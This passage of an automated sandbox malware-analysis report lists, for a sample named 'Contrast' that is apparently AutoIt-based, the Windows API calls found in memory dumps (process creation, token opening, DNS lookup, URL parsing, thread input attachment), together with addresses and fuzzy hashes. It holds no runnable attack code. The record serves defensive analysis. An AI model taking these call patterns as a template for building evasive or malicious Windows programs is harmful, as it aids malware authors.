• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
APIs
• _free.LIBCMT ref: 00545331
  • Part of subcall function 0053593C: __FF_MSGBANNER.LIBCMT ref: 00535953
  • Part of subcall function 0053593C: __NMSG_WRITE.LIBCMT ref: 0053595A
  • Part of subcall function 0053593C: RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001,?,00000004,?,?,00531003,?), ref: 0053597F
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00574385
• _memset.LIBCMT ref: 005743A6
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 005743F8
• CloseHandle.KERNEL32(00000000), ref: 00574401
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
APIs
  • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577E51,?,?,00000000), ref: 00524041
  • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577E51,?,?,00000000,?,?), ref: 00524065
• gethostbyname.WSOCK32(?,?,?), ref: 00586A84
• WSAGetLastError.WSOCK32(00000000), ref: 00586A8F
• _memmove.LIBCMT ref: 00586ABC
• inet_ntoa.WSOCK32(?), ref: 00586AC7
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
APIs
  • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
• DefDlgProcW.USER32(?,00000020,?), ref: 005116B4
• GetClientRect.USER32(?,?), ref: 0054B93C
• GetCursorPos.USER32(?), ref: 0054B946
• ScreenToClient.USER32(?,?), ref: 0054B951
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4127811313-0
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00569719
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 0056972B
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00569741
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 0056975C
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
• GetStockObject.GDI32(00000011), ref: 00512163
• SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005704EC,?,0057153F,?,00008000), ref: 0057195E
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,005704EC,?,0057153F,?,00008000), ref: 00571983
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005704EC,?,0057153F,?,00008000), ref: 0057198D
• Sleep.KERNEL32(?,?,?,?,?,?,?,005704EC,?,0057153F,?,00008000), ref: 005719C0
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0059E1EA
• LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0059E201
• RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0059E216
• RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0059E234
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
APIs
• GetWindowRect.USER32(?,?), ref: 0059B956
• ScreenToClient.USER32(?,?), ref: 0059B96E
• ScreenToClient.USER32(?,?), ref: 0059B992
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0059B9AD
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
APIs
• _memset.LIBCMT ref: 0059BCB6
• _memset.LIBCMT ref: 0059BCC5
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005D8F20,005D8F64), ref: 0059BCF4
• CloseHandle.KERNEL32 ref: 0059BD06
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID:
• API String ID: 3277943733-0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 005771A1
  • Part of subcall function 00577C7F: _memset.LIBCMT ref: 00577CB4
• _memmove.LIBCMT ref: 005771C4
• _memset.LIBCMT ref: 005771D1
• LeaveCriticalSection.KERNEL32(?), ref: 005771E1
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 48991266-0
                                                                                                                                        • Opcode ID: 41baed4f4d6717d257e0858296ec0b56b19a50e4c4dc0785f222e89dda709797
                                                                                                                                        • Instruction ID: 0b182515e47225764c3384b4414417635c72d1d63b11f998476b670df611eb51
                                                                                                                                        • Opcode Fuzzy Hash: 41baed4f4d6717d257e0858296ec0b56b19a50e4c4dc0785f222e89dda709797
                                                                                                                                        • Instruction Fuzzy Hash: 0BF0303A100104ABCF016F55EC8DA4ABF29FF89320F04C051FE085E25AC731E915EBB4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005116CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00511729
                                                                                                                                          • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511738
                                                                                                                                          • Part of subcall function 005116CF: BeginPath.GDI32(?), ref: 0051174F
                                                                                                                                          • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511778
                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0059C3E8
                                                                                                                                        • LineTo.GDI32(00000000,?,?), ref: 0059C3F5
                                                                                                                                        • EndPath.GDI32(00000000), ref: 0059C405
                                                                                                                                        • StrokePath.GDI32(00000000), ref: 0059C413
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                        • Opcode ID: a4e28f6422901ff9d625ae8cc5c7d7c95c4ea9cc8ba915d8479e22d5e6c0bf50
                                                                                                                                        • Instruction ID: 4f076d31ac96ea9231298c7ae9d7b4fbeff8987317f9ab6a2af5903a24445f41
                                                                                                                                        • Opcode Fuzzy Hash: a4e28f6422901ff9d625ae8cc5c7d7c95c4ea9cc8ba915d8479e22d5e6c0bf50
                                                                                                                                        • Instruction Fuzzy Hash: 3FF0BE31005219BADF222F50AC0DFCE3F59BF2A311F048001FA11210E283741659EBA9
                                                                                                                                        APIs
                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0056AA6F
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0056AA82
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0056AA89
                                                                                                                                        • AttachThreadInput.USER32(00000000), ref: 0056AA90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                        • Opcode ID: fc7e98d7ba5532037bd25951984227722b0a102f692b62f6f31364435e2ef0d8
                                                                                                                                        • Instruction ID: 390acdb47c511851c58a17c8e258e33126364f45b805f365e3066ffdaa4ab2e2
                                                                                                                                        • Opcode Fuzzy Hash: fc7e98d7ba5532037bd25951984227722b0a102f692b62f6f31364435e2ef0d8
                                                                                                                                        • Instruction Fuzzy Hash: 59E06D31541228BADB215FA2DD0CEEB3F5CFF227A1F008012F50996090C771C554DBE0
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(00000008), ref: 0051260D
                                                                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00512617
                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0051262C
                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00512634
                                                                                                                                        • GetWindowDC.USER32(?,00000000), ref: 0054C1C4
                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0054C1D1
                                                                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0054C1EA
                                                                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0054C203
                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0054C223
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0054C22E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1946975507-0
                                                                                                                                        • Opcode ID: 13074587bb303cb09006859c7c3575dedbcbc77cdaea5dbfca2307378e153f5c
                                                                                                                                        • Instruction ID: 15e85019684c43d2a8910baea691cc9c99309a6c13ba326a6b73b8e60dd6e3ce
                                                                                                                                        • Opcode Fuzzy Hash: 13074587bb303cb09006859c7c3575dedbcbc77cdaea5dbfca2307378e153f5c
                                                                                                                                        • Instruction Fuzzy Hash: 90E06531514244BBDB615F64AC097D83F11FB56335F048366FA69480E187714594EB11
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00569339
                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00568F04), ref: 00569340
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00568F04), ref: 0056934D
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00568F04), ref: 00569354
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3974789173-0
                                                                                                                                        • Opcode ID: 93581c3b5518137ef403ad1cd0e77fce2e0522f23881f98c730c1829769e31b6
                                                                                                                                        • Instruction ID: cad59c02906ca03e2adde367f75eb049c5868334e574d53c76f0d224ea80e416
                                                                                                                                        • Opcode Fuzzy Hash: 93581c3b5518137ef403ad1cd0e77fce2e0522f23881f98c730c1829769e31b6
                                                                                                                                        • Instruction Fuzzy Hash: ECE08636711311AFD7205FB19D0DB573B6CFF62792F104C18B245CA0D0E634A448D751
                                                                                                                                        APIs
                                                                                                                                        • GetDesktopWindow.USER32 ref: 00550679
                                                                                                                                        • GetDC.USER32(00000000), ref: 00550683
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005506A3
                                                                                                                                        • ReleaseDC.USER32(?), ref: 005506C4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                        • Opcode ID: 249d8844032a78a5ec0c7a557b26a85b05130528306ac86c06bd3d9099748335
                                                                                                                                        • Instruction ID: 564149800bd5bc120d6614c78daf5457bcb4ce1281828728277e79f099ec8dc8
                                                                                                                                        • Opcode Fuzzy Hash: 249d8844032a78a5ec0c7a557b26a85b05130528306ac86c06bd3d9099748335
                                                                                                                                        • Instruction Fuzzy Hash: E3E065B0800204EFDF018F60D808A9D7FB1BBAC310F109809F80AA7290CB388095AF10
                                                                                                                                        APIs
                                                                                                                                        • GetDesktopWindow.USER32 ref: 0055068D
                                                                                                                                        • GetDC.USER32(00000000), ref: 00550697
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005506A3
                                                                                                                                        • ReleaseDC.USER32(?), ref: 005506C4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2889604237-0
APIs
  • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
  • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
  • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
• __wcsnicmp.LIBCMT ref: 0057B670
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0057B739
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: _memmove
• String ID: #VR
• API String ID: 4104443479-2899241889
APIs
• Sleep.KERNEL32(00000000), ref: 0051E01E
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0051E037
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
APIs
• SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00598186
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0059819B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
APIs
• _memset.LIBCMT ref: 00582C6A
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00582CA0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 0059713C
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00597178
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• _memset.LIBCMT ref: 005730B8
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005730F3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• __snwprintf.LIBCMT ref: 00584132
  • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __snwprintf_memmove
                                                                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                        • API String ID: 3506404897-2584243854
                                                                                                                                        • Opcode ID: b5bef96d8081c036162c111bf645f96b1c86422ad677f1956019dc16a14b3dd5
                                                                                                                                        • Instruction ID: 774f157f3bede05edcc3130f2f4b448beb52c3218e10ceaac372beea272d84fc
                                                                                                                                        • Opcode Fuzzy Hash: b5bef96d8081c036162c111bf645f96b1c86422ad677f1956019dc16a14b3dd5
                                                                                                                                        • Instruction Fuzzy Hash: 6B218270A0021EAFDF10EFA4D899EAE7FA5BF95740F400458FD05A7281DB30A985CBA5
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00596D86
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00596D91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: Combobox
                                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                                        • Opcode ID: e983c99654798a1fe165ac311af75721e93d6c06566ced096419577bc851fa9d
                                                                                                                                        • Instruction ID: c78642ff7118f4faebaf4c0de943895e681cf3797cea03bfea3980eca1424e0b
                                                                                                                                        • Opcode Fuzzy Hash: e983c99654798a1fe165ac311af75721e93d6c06566ced096419577bc851fa9d
                                                                                                                                        • Instruction Fuzzy Hash: 3911BF71310209BFEF218E54DC81EFB3FAAFB883A4F104129F9289B290D6319C5487A0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00512111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
                                                                                                                                          • Part of subcall function 00512111: GetStockObject.GDI32(00000011), ref: 00512163
                                                                                                                                          • Part of subcall function 00512111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00597296
                                                                                                                                        • GetSysColor.USER32(00000012), ref: 005972B0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                        • String ID: static
                                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                                        • Opcode ID: 65221c26841828b7289eba3b573d881fe0eee28aa51a20f5a96ef4a1046ec97d
                                                                                                                                        • Instruction ID: 5bf36cbeddd01ca4835d5b71f04c6032125e32fc352a75812781da67fd3a0faa
                                                                                                                                        • Opcode Fuzzy Hash: 65221c26841828b7289eba3b573d881fe0eee28aa51a20f5a96ef4a1046ec97d
                                                                                                                                        • Instruction Fuzzy Hash: FA21477262420AAFDF04DFB8CC45AFA7BA8FB08304F004519FD55D3240E734A850DB50
                                                                                                                                        APIs
                                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00596FC7
                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00596FD6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
